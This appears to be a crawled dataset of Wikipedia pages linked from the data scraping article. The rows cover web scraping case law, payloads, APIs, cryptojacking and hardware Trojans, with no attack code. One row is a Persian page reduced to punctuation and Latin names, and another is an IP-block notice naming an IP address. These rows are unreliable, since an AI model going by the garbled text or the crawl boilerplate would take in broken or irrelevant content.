Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
431 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Payload_(computing) | In computing and telecommunications, the payload is the part of transmitted data that is the actual intended message. Headers and metadata are sent only to enable payload delivery 1 2 and are considered overhead. In the context of a computer virus or worm, the payload is the portion of the malware which performs malicious action. The term is borrowed from transportation, where payload refers to the part of the load that pays for transportation. In computer networking, the data to be transmitted is the payload. It is almost always encapsulated in some type of frame format, composed of framing bits and a frame check sequence. 3 4 Examples are Ethernet frames, Point-to-Point Protocol (PPP) frames, Fibre Channel frames, and V.42 modem frames. In computer programming, the most common usage of the term is in the context of message protocols, to differentiate the protocol overhead from the actual data. For example, a JSON web service response might be: The string Hello, world is the payload of JSON message, while the rest is protocol overhead. In computer security, the payload is the part of the private user text which could also contain malware such as worms or viruses which performs the malicious action; deleting data, sending spam or encrypting data. 5 In addition to the payload, such malware also typically has overhead code aimed at simply spreading itself, or avoiding detection. |
432 | https://en.wikipedia.org/wiki/Web_scraping | https://fa.wikipedia.org/wiki/%D9%88%D8%A8_%D8%A7%D8%B3%DA%A9%D8%B1%D9%BE%DB%8C%D9%86%DA%AF | . HTML . . . . ( ). . . . . ( ) . ( ) . . (HTML XHTML) . . . . . ( ) . DOM . . . . . . grep ( ) . HTTP . . . wrapper . Wrapper wrapper URL . XQuery HTQL HTML . . DOM . Xpath DOM . . ( ) . . ( ) ( ) . Long Tail . . Microformat DOM . . . . . scraping API . . . : ( ) ( ) ( ) ("CFAA") ( ) . . Feist v. . . eBay v. Bidder's Edge Bidder's Edge eBay . sniping . . . (AA) FareChase . AA FareChase AA . FareChase AA . FareChase . FareChase AA . FareChase Outtask . Southwest . . . Outtask . FareChase Outtask Concur . 3Taps Craigslist . Craigslist 3Taps IP Craigslist v. 3Taps . IP Craigslist 3Taps . . . . Cvent, Inc. . QVC QVC Pinterest . QVC QVC ( QVC ) QVC QVC . . QVC IP QVC . QVC QVC Resultly . . . (UCITA) - . Facebook, Inc. v. Power Ventures, Inc. Power Ventures . . Associated Press v. Meltwater US Holdings, Inc. Meltwater Meltwater . . ( ) ofir.dk Home.dk . . Ryanair Ltd v Billigfluege.de GmbH Ryanair . Ryanair . . (CNIL) . CNIL . . . . . . : |
433 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Special:UrlShortener&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FWeb_scraping | The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Main Page. |
434 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/API | An application programming interface (API) is a way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. 1 A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system's user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system's capabilities. In contrast to a user interface, which connects a computer to a person, an application programming interface connects computers or pieces of software to each other. It is not intended to be used directly by a person (the end user) other than a computer programmer who is incorporating it into the software. An API is often made up of different parts which act as tools or services that are available to the programmer. A program or a programmer that uses one of these parts is said to call that portion of the API. The calls that make up the API are also known as subroutines, methods, requests, or endpoints. An API specification defines these calls, meaning that it explains how to use or implement them. One purpose of APIs is to hide the internal details of how a system works, exposing only those parts that a programmer will find useful, and keeping them consistent even if the internal details change later. An API may be custom-built for a particular pair of systems, or it may be a shared standard allowing interoperability among many systems. There are APIs for programming languages, software libraries, computer operating systems, and computer hardware. APIs originated in the 1940s, though the term did not emerge until the 1960s and 1970s. Contemporary usage of the term API often refers to web APIs, 2 which allow communication between computers that are joined by the internet. Recent developments in APIs have led to the rise in popularity of microservices, which are loosely coupled services accessed through public APIs. 3 APIs should be versioned. There are two common versioning strategies: 4 In building applications, an API simplifies programming by abstracting the underlying implementation and only exposing objects or actions the developer needs. While a graphical interface for an email client might provide a user with a button that performs all the steps for fetching and highlighting new emails, an API for file input output might give the developer a function that copies a file from one location to another without requiring that the developer understand the file system operations occurring behind the scenes. 5 The term API initially described an interface only for end-user-facing programs, known as application programs. This origin is still reflected in the name "application programming interface. Today, the term is broader, including also utility software and even hardware interfaces. 7 The idea of the API is much older than the term itself. British computer scientists Maurice Wilkes and David Wheeler worked on a modular software library in the 1940s for EDSAC, an early computer. The subroutines in this library were stored on punched paper tape organized in a filing cabinet. This cabinet also contained what Wilkes and Wheeler called a "library catalog" of notes about each subroutine and how to incorporate it into a program. Today, such a catalog would be called an API (or an API specification or API documentation) because it instructs a programmer on how to use (or "call") each subroutine that the programmer needs. 7 Wilkes and Wheeler's 1951 book The Preparation of Programs for an Electronic Digital Computer contains the first published API specification. Joshua Bloch considers that Wilkes and Wheeler "latently invented" the API because it is more of a concept that is discovered than invented. 7 The term "application program interface" (without an ing suffix) is first recorded in a paper called Data structures and techniques for remote computer graphics presented at an AFIPS conference in 1968. 9 7 The authors of this paper use the term to describe the interaction of an application—a graphics program in this case—with the rest of the computer system. A consistent application interface (consisting of Fortran subroutine calls) was intended to free the programmer from dealing with idiosyncrasies of the graphics display device, and to provide hardware independence if the computer or the display were replaced. 8 The term was introduced to the field of databases by C. J. Date 10 in a 1974 paper called The Relational and Network Approaches: Comparison of the Application Programming Interface. 11 An API became a part of the ANSI SPARC framework for database management systems. This framework treated the application programming interface separately from other interfaces, such as the query interface. Database professionals in the 1970s observed these different interfaces could be combined; a sufficiently rich application interface could support the other interfaces as well. 6 This observation led to APIs that supported all types of programming, not just application programming. By 1990, the API was defined simply as "a set of services available to a programmer for performing certain tasks" by technologist Carl Malamud. 12 The idea of the API was expanded again with the dawn of remote procedure calls and web APIs. As computer networks became common in the 1970s and 1980s, programmers wanted to call libraries located not only on their local computers but on computers located elsewhere. These remote procedure calls were well supported by the Java language in particular. In the 1990s, with the spread of the internet, standards like CORBA, COM, and DCOM competed to become the most common way to expose API services. 13 Roy Fielding's dissertation Architectural Styles and the Design of Network-based Software Architectures at UC Irvine in 2000 outlined Representational state transfer (REST) and described the idea of a "network-based Application Programming Interface" that Fielding contrasted with traditional "library-based" APIs. 14 XML and JSON web APIs saw widespread commercial adoption beginning in 2000 and continuing as of 2022. The web API is now the most common meaning of the term API. 2 The Semantic Web proposed by Tim Berners-Lee in 2001 included "semantic APIs" that recasts the API as an open, distributed data interface rather than a software behavior interface. 15 Proprietary interfaces and agents became more widespread than open ones, but the idea of the API as a data interface took hold. Because web APIs are widely used to exchange data of all kinds online, API has become a broad term describing much of the communication on the internet. 13 When used in this way, the term API has overlap in meaning with the term communication protocol. The interface to a software library is one type of API. The API describes and prescribes the "expected behavior" (a specification) while the library is an "actual implementation" of this set of rules. A single API can have multiple implementations (or none, being abstract) in the form of different libraries that share the same programming interface. The separation of the API from its implementation can allow programs written in one language to use a library written in another. For example, because Scala and Java compile to compatible bytecode, Scala developers can take advantage of any Java API. 16 API use can vary depending on the type of programming language involved. An API for a procedural language such as Lua could consist primarily of basic routines to execute code, manipulate data or handle errors while an API for an object-oriented language, such as Java, would provide a specification of classes and its class methods. 17 18 Hyrum's law states that "With a sufficient number of users of an API, it does not matter what you promise in the contract: all observable behaviors of your system will be depended on by somebody. 19 Meanwhile, several studies show that most applications that use an API tend to use a small part of the API. 20 Language bindings are also APIs. By mapping the features and capabilities of one language to an interface implemented in another language, a language binding allows a library or service written in one language to be used when developing in another language. citation needed Tools such as SWIG and F2PY, a Fortran-to-Python interface generator, facilitate the creation of such interfaces. 21 An API can also be related to a software framework: a framework can be based on several libraries implementing several APIs, but unlike the normal use of an API, the access to the behavior built into the framework is mediated by extending its content with new classes plugged into the framework itself. Moreover, the overall program flow of control can be out of the control of the caller and in the framework's hands by inversion of control or a similar mechanism. 22 23 An API can specify the interface between an application and the operating system. 24 POSIX, for example, provides a set of common API specifications that aim to enable an application written for a POSIX conformant operating system to be compiled for another POSIX conformant operating system. Linux and Berkeley Software Distribution are examples of operating systems that implement the POSIX APIs. 25 Microsoft has shown a strong commitment to a backward-compatible API, particularly within its Windows API (Win32) library, so older applications may run on newer versions of Windows using an executable-specific setting called "Compatibility Mode". 26 An API differs from an application binary interface (ABI) in that an API is source code based while an ABI is binary based. For instance, POSIX provides APIs while the Linux Standard Base provides an ABI. 27 28 Remote APIs allow developers to manipulate remote resources through protocols, specific standards for communication that allow different technologies to work together, regardless of language or platform. For example, the Java Database Connectivity API allows developers to query many different types of databases with the same set of functions, while the Java remote method invocation API uses the Java Remote Method Protocol to allow invocation of functions that operate remotely but appear local to the developer. 29 30 Therefore, remote APIs are useful in maintaining the object abstraction in object-oriented programming; a method call, executed locally on a proxy object, invokes the corresponding method on the remote object, using the remoting protocol, and acquires the result to be used locally as a return value. A modification of the proxy object will also result in a corresponding modification of the remote object. 31 Web APIs are a service accessed from client devices (mobile phones, laptops, etc.) to a web server using the Hypertext Transfer Protocol (HTTP). Client devices send a request in the form of an HTTP request, and are met with a response message usually in JavaScript Object Notation (JSON) or Extensible Markup Language (XML) format. Developers typically use Web APIs to query a server for a specific set of data from that server. An example might be a shipping company API that can be added to an eCommerce-focused website to facilitate ordering shipping services and automatically include current shipping rates, without the site developer having to enter the shipper's rate table into a web database. While "web API" historically has been virtually synonymous with web service, the recent trend (so-called Web 2.0) has been moving away from Simple Object Access Protocol (SOAP) based web services and service-oriented architecture (SOA) towards more direct representational state transfer (REST) style web resources and resource-oriented architecture (ROA). 32 Part of this trend is related to the Semantic Web movement toward Resource Description Framework (RDF), a concept to promote web-based ontology engineering technologies. Web APIs allow the combination of multiple APIs into new applications known as mashups. 33 In the social media space, web APIs have allowed web communities to facilitate sharing content and data between communities and applications. In this way, content that is created in one place dynamically can be posted and updated to multiple locations on the web. 34 For example, Twitter's REST API allows developers to access core Twitter data and the Search API provides methods for developers to interact with Twitter Search and trends data. 35 The design of an API has a significant impact on its usage. 5 First of all, the design of programming interfaces represents an important part of software architecture, the organization of a complex piece of software. 36 The principle of information hiding describes the role of programming interfaces as enabling modular programming by hiding the implementation details of the modules so that users of modules need not understand the complexities inside the modules. 37 Aside from the previous underlying principle, other metrics for measuring the usability of an API may include properties such as functional efficiency, overall correctness, and learnability for novices. 38 One straightforward and commonly adopted way of designing APIs is to follow Nielsen's heuristic evaluation guidelines. The Factory method pattern is also typical in designing APIs due to their reusable nature. 39 Thus, the design of an API attempts to provide only the tools a user would expect. 5 An application programming interface can be synchronous or asynchronous. A synchronous API call is a design pattern where the call site is blocked while waiting for the called code to finish. 40 With an asynchronous API call, however, the call site is not blocked while waiting for the called code to finish, and instead the calling thread is notified when the reply arrives. API security is very critical when developing a public facing API. Common threats include SQL injection, Denial-of-service attack (DoS), broken authentication, and exposing sensitive data. 41 Without ensuring proper security practices, bad actors can get access to information they should not have or even gain privileges to make changes to your server. Some common security practices include proper connection security using HTTPS, content security to mitigate data injection attacks, and requiring an API key to use your service. 42 Many public facing API services require you to use an assigned API key, and will refuse to serve data without sending the key with your request. 43 APIs are one of the more common ways technology companies integrate. Those that provide and use APIs are considered as being members of a business ecosystem. 44 The main policies for releasing an API are: 45 An important factor when an API becomes public is its "interface stability". Changes to the API—for example adding new parameters to a function call—could break compatibility with the clients that depend on that API. 49 When parts of a publicly presented API are subject to change and thus not stable, such parts of a particular API should be documented explicitly as "unstable". For example, in the Google Guava library, the parts that are considered unstable, and that might change soon, are marked with the Java annotation Beta. 50 A public API can sometimes declare parts of itself as deprecated or rescinded. This usually means that part of the API should be considered a candidate for being removed, or modified in a backward incompatible way. Therefore, these changes allow developers to transition away from parts of the API that will be removed or not supported in the future. 51 On February 19, 2020, Akamai published their annual "State of the Internet" report, showcasing the growing trend of cybercriminals targeting public API platforms at financial services worldwide. From December 2017 through November 2019, Akamai witnessed 85.42 billion credential violation attacks. About 20%, or 16.55 billion, were against hostnames defined as API endpoints. Of these, 473.5 million have targeted financial services sector organizations. 52 API documentation describes the services an API offers and how to use those services, aiming to cover everything a client would need to know for practical purposes. Documentation is crucial for the development and maintenance of applications using the API. 53 API documentation is traditionally found in documentation files but can also be found in social media such as blogs, forums, and Q A websites. 54 Traditional documentation files are often presented via a documentation system, such as Javadoc or Pydoc, that has a consistent appearance and structure. However, the types of content included in the documentation differ from API to API. 55 In the interest of clarity, API documentation may include a description of classes and methods in the API as well as "typical usage scenarios, code snippets, design rationales, performance discussions, and contracts", but implementation details of the API services themselves are usually omitted. Reference documentation for a REST API can be generated automatically from an OpenAPI document, which is a machine-readable text file that uses a prescribed format and syntax defined in the OpenAPI Specification. The OpenAPI document defines basic information such as the API's name and description, as well as describing operations the API provides access to. 56 API documentation can be enriched with metadata information like Java annotations. This metadata can be used by the compiler, tools, and by the run-time environment to implement custom behaviors or custom handling. 57 In 2010, Oracle Corporation sued Google for having distributed a new implementation of Java embedded in the Android operating system. 58 Google had not acquired any permission to reproduce the Java API, although permission had been given to the similar OpenJDK project. Google had approached Oracle to negotiate a license for their API, but were turned down due to trust issues. Despite the disagreement, Google chose to use Oracle's code anyway. Judge William Alsup ruled in the Oracle v. Google case that APIs cannot be copyrighted in the U.S and that a victory for Oracle would have widely expanded copyright protection to a "functional set of symbols" and allowed the copyrighting of simple software commands: To accept Oracle's claim would be to allow anyone to copyright one version of code to carry out a system of commands and thereby bar all others from writing its different versions to carry out all or part of the same commands. 59 60 Alsup's ruling was overturned in 2014 on appeal to the Court of Appeals for the Federal Circuit, though the question of whether such use of APIs constitutes fair use was left unresolved. 61 62 In 2016, following a two-week trial, a jury determined that Google's reimplementation of the Java API constituted fair use, but Oracle vowed to appeal the decision. 63 Oracle won on its appeal, with the Court of Appeals for the Federal Circuit ruling that Google's use of the APIs did not qualify for fair use. 64 In 2019, Google appealed to the Supreme Court of the United States over both the copyrightability and fair use rulings, and the Supreme Court granted review. 65 Due to the COVID 19 pandemic, the oral hearings in the case were delayed until October 2020. 66 The case was decided by the Supreme Court in Google's favor with a ruling of 6 2. Justice Stephen Breyer delivered the opinion of the court and at one point mentioned that "The declaring code is, if copyrightable at all, further than are most computer programs from the core of copyright. This means the code used in APIs are more similar to dictionaries than novels in terms of copyright protection. 67 |
435 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cryptojacking | Cryptojacking is the act of exploiting a computer to mine cryptocurrencies, often through websites, 1 2 3 against the user's will or while the user is unaware. 4 One notable piece of software used for cryptojacking was Coinhive, which was used in over two-thirds of cryptojacks before its March 2019 shutdown. 5 The cryptocurrencies mined the most often are privacy coins—coins with hidden transaction histories—such as Monero and Zcash. 2 6 Like most malicious attacks on the computing public, the motive is profit, but unlike other threats, it is designed to remain completely hidden from the user. Cryptojacking malware can lead to slowdowns and crashes due to straining of computational resources. 7 Bitcoin mining by personal computers infected with malware is being challenged by dedicated hardware, such as FPGA and ASIC platforms, which are more efficient in terms of power consumption and thus may have lower costs than theft of computing resources. 8 In June 2011, Symantec warned about the possibility that botnets could mine covertly for bitcoins. 9 Malware used the parallel processing capabilities of GPUs built into many modern video cards. 10 Although the average PC with an integrated graphics processor is virtually useless for bitcoin mining, tens of thousands of PCs laden with mining malware could produce some results. 11 In mid-August 2011, bitcoin mining botnets were detected, 12 13 14 and less than three months later, bitcoin mining trojans had infected Mac OS X. 15 In April 2013, electronic sports organization E-Sports Entertainment was accused of hijacking 14,000 computers to mine bitcoins; the company later settled the case with the State of New Jersey. 16 German police arrested two people in December 2013 who customized existing botnet software to perform bitcoin mining, which police said had been used to mine at least $950,000 worth of bitcoins. 17 For four days in December 2013 and January 2014, Yahoo Europe hosted an ad containing bitcoin mining malware that infected an estimated two million computers using a Java vulnerability. 18 19 Another software, called Sefnit, was first detected in mid 2013 and has been bundled with many software packages. Microsoft has been removing the malware through its Microsoft Security Essentials and other security software. 20 Several reports of employees or students using university or research computers to mine bitcoins have been published. 21 On February 20, 2014, a member of the Harvard community was stripped of his or her access to the university's research computing facilities after setting up a Dogecoin mining operation using a Harvard research network, according to an internal email circulated by Faculty of Arts and Sciences Research Computing officials. 22 Ars Technica reported in January 2018 that YouTube advertisements contained JavaScript code that mined the cryptocurrency Monero. 23 In 2021, multiple zero-day vulnerabilities were found on Microsoft Exchange servers, allowing remote code execution. These vulnerabilities were exploited to mine cryptocurrency. 24 Traditional countermeasures of cryptojacking are host-based and not suitable for corporate networks. A potential solution is a network-based approach called Crypto-Aegis, which uses machine learning to detect cryptocurrency activities in network traffic, even when encrypted or mixed with non-malicious data. 25 |
436 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:MyTalk | This user is currently blocked. The latest block log entry is provided below for reference: People on Wikipedia can use this talk page to post a public message about edits made from the IP address you are currently using. Many IP addresses change periodically, and are often shared by several people. You may create an account or log in to avoid future confusion with other logged out users. Creating an account also hides your IP address. |
437 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hardware_Trojan | A Hardware Trojan (HT) is a malicious modification of the circuitry of an integrated circuit. A hardware Trojan is completely characterized by its physical representation and its behavior. The payload of an HT is the entire activity that the Trojan executes when it is triggered. In general, Trojans try to bypass or disable the security fence of a system: for example, leaking confidential information by radio emission. HTs also could disable, damage or destroy the entire chip or components of it. Hardware Trojans may be introduced as hidden "Front-doors" that are inserted while designing a computer chip, by using a pre-made application-specific integrated circuit (ASIC) semiconductor intellectual property core (IP Core) that have been purchased from a non-reputable source, or inserted internally by a rogue employee, either acting on their own, or on behalf of rogue special interest groups, or state sponsored spying and espionage. 1 One paper published by IEEE in 2015 explains how a hardware design containing a Trojan could leak a cryptographic key leaked over an antenna or network connection, provided that the correct "easter egg" trigger is applied to activate the data leak. 2 In high security governmental IT departments, hardware Trojans are a well known problem when buying hardware such as: a KVM switch, keyboards, mice, network cards, or other network equipment. This is especially the case when purchasing such equipment from non-reputable sources that could have placed hardware Trojans to leak keyboard passwords, or provide remote unauthorized entry. 3 In a diverse global economy, outsourcing of production tasks is a common way to lower a product's cost. Embedded hardware devices are not always produced by the firms that design and or sell them, nor in the same country where they will be used. Outsourced manufacturing can raise doubt about the evidence for the integrity of the manufactured product (i.e., one's certainty that the end-product has no design modifications compared to its original design). Anyone with access to the manufacturing process could, in theory, introduce some change to the final product. For complex products, small changes with large effects can be difficult to detect. The threat of a serious, malicious, design alteration can be especially relevant to government agencies. Resolving doubt about hardware integrity is one way to reduce technology vulnerabilities in the military, finance, energy and political sectors of an economy. Since fabrication of integrated circuits in untrustworthy factories is common, advanced detection techniques have emerged to discover when an adversary has hidden additional components in, or otherwise sabotaged, the circuit's function. An HT can be characterized by several methods such as by its physical representation, activation phase and its action phase. Alternative methods characterize the HT by trigger, payload and stealth. One of this physical Trojan characteristics is the type. The type of a Trojan can be either functional or parametric. A Trojan is functional if the adversary adds or deletes any transistors or gates to the original chip design. The other kind of Trojan, the parametric Trojan, modifies the original circuitry, e.g. thinning of wires, weakening of flip-flops or transistors, subjecting the chip to radiation, or using Focused Ion-Beams (FIB) to reduce the reliability of a chip. The size of a Trojan is its physical extension or the number of components it is made of. Because a Trojan can consist of many components, the designer can distribute the parts of a malicious logic on the chip. The additional logic can occupy the chip wherever it is needed to modify, add, or remove a function. Malicious components can be scattered, called loose distribution, or consist of only few components, called tight distribution, so the area is small where the malicious logic occupies the layout of the chip. In some cases, high-effort adversaries in may regenerate the layout so that the placement of the components of the IC is altered. In rare cases the chip dimension is altered. These changes are structural alterations. The typical Trojan is condition-based: It is triggered by sensors, internal logic states, a particular input pattern or an internal counter value. Condition-based Trojans are detectable with power traces to some degree when inactive. That is due to the leakage currents generated by the trigger or counter circuit activating the Trojan. Hardware Trojans can be triggered in different ways. A Trojan can be internally activated, which means it monitors one or more signals inside the IC. The malicious circuitry could wait for a count down logic an attacker added to the chip, so that the Trojan awakes after a specific time-span. The opposite is externally activated. There can be malicious logic inside a chip, that uses an antenna or other sensors the adversary can reach from outside the chip. For example, a Trojan could be inside the control system of a cruising missile. The owner of the missile does not know, that the enemy will be able to switch off the rockets by radio. A Trojan which is always-on can be a reduced wire. A chip that is modified in this way produces errors or fails every time the wire is used intensely. Always-on circuits are hard to detect with power trace. In this context combinational Trojans and sequential Trojans are distinguished. A combinational Trojan monitors internal signals until a specific condition happens. A sequential Trojan is also an internally activated condition-based circuit, but it monitors the internal signals and searches for sequences not for a specific state or condition like the combinational Trojans do. Extraction of secret keys by means of a hardware Trojan without detecting the Trojan requires that the Trojan uses a random signal or some cryptographic implementation itself. To avoid storing a cryptographic key in the Trojan itself and reduction, a physical unclonable function can be used. 4 Physical unclonable functions are small in size and can have an identical layout while the cryptographic properties are different. A HT could modify the chip's function or changes the chip's parametric properties (e.g. provokes a process delay). Confidential information can also be transmitted to the adversary (transmission of key information). A relatively new threat vector to networks and network endpoints is a HT appearing as a physical peripheral device that is designed to interact with the network endpoint using the approved peripheral device's communication protocol. For example, a USB keyboard that hides all malicious processing cycles from the target network endpoint to which it is attached by communicating with the target network endpoint using unintended USB channels. Once sensitive data is ex-filtrated from the target network endpoint to the HT, the HT can process the data and decide what to do with it: store it to memory for later physical retrieval of the HT or possibly ex-filtrate it to the internet using wireless or using the compromised network endpoint as a pivot. 5 6 A common Trojan is passive for the most time-span an altered device is in use, but the activation can cause a fatal damage. If a Trojan is activated the functionality can be changed, the device can be destroyed or disabled, it can leak confidential information or tear down the security and safety. Trojans are stealthy, that means the precondition for activation is a very rare event. Traditional testing techniques are not sufficient. A manufacturing fault happens at a random position while malicious changes are well placed to avoid detection. First, the molding coat is cut to reveal the circuitry. Then, the engineer repeatedly scans the surface while grinding the layers of the chip. There are several operations to scan the circuitry. Typical visual inspection methods are: scanning optical microscopy (SOM), scanning electron microscopy (SEM), 7 pico-second imaging circuit analysis (PICA), voltage contrast imaging (VCI), light induced voltage alteration (LIVA) or charge induced voltage alteration (CIVA). To compare the floor plan of the chip has to be compared with the image of the actual chip. This is still quite challenging to do. To detect Trojan hardware which include (crypto) keys which are different, an image diff can be taken to reveal the different structure on the chip. The only known hardware Trojan using unique crypto keys but having the same structure is. 8 This property enhances the undetectability of the Trojan. This detection method stimulates the input ports of a chip and monitors the output to detect manufacturing faults. If the logic values of the output do not match the genuine pattern, then a defect or a Trojan could be found. Built-in self-test (BIST) and Design For Test (DFT) techniques add circuitry (logic) to the chip intended to help verify that the chip, as built, implements its functional specification. The extra logic monitors input stimulus and internal signals or memory states, generally by computing checksums or by exposing internal registers via a customized scanning technique. Where DFT usually coordinates with some external testing mechanism, BIST-enabled chips incorporate custom test-pattern generators. BIST functionality often exists to perform at-speed (high speed) verification where it is not possible to use scan chains or other low-speed DFT capabilities. Both methods were originally developed to detect manufacturing errors, but also have the double-edged potential to detect some effects of malicious logic on the chip, or to be exploited by malicious logic to covertly inspect remote state within the chip. Consider how DFT recognizes unintended logic. When driven by DFT inputs, a genuine chip generates a familiar signature, but a defective or altered chip displays an unexpected signature. The signature may consist of any number of data outputs from the chip: an entire scan chain or intermediate data result. In a Trojan-detection context, DFT logic may be regarded as an encryption algorithm: using the DFT input as key to sign a message derived from the behavior of the design under test. In an intrusion-avoidance context, BIST or DFT functions are typically disabled (by hardware-reconfiguration) outside of a manufacturing environment because their access to the chip's internal state can expose its function to covert surveillance or subversive attack. Every device that is electrically active emits different signals like magnetic and electric fields. Those signals that are caused by the electric activity, can be analyzed to gain information about the state and the data which the device processes. Advanced methods to measure these side-effects have been developed and they are very sensitive (side-channel attack). 